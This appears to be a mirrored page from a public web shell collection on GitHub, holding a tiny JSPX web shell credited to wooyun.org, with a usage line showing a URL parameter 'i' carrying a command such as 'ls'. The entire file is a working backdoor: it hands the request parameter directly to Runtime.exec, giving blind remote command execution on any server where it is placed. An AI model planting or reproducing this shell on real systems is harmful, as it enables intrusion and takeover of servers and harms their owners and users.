mirror of
https://github.com/tennc/webshell
synced 2024-11-13 23:17:10 +00:00
6c708c5f1a
from wooyun.org 使用说明:http://xx.xx.xx/jjw.jspx?i=ls 无回显
6 lines
239 B
Text
6 lines
239 B
Text
<jsp:root xmlns:jsp="http://java.sun.com/JSP/Page" version="1.2">
|
|
<jsp:directive.page contentType="text/html" pageEncoding="UTF-8" />
|
|
<jsp:scriptlet>
|
|
Runtime.getRuntime().exec(request.getParameter("i"));
|
|
</jsp:scriptlet>
|
|
</jsp:root>
|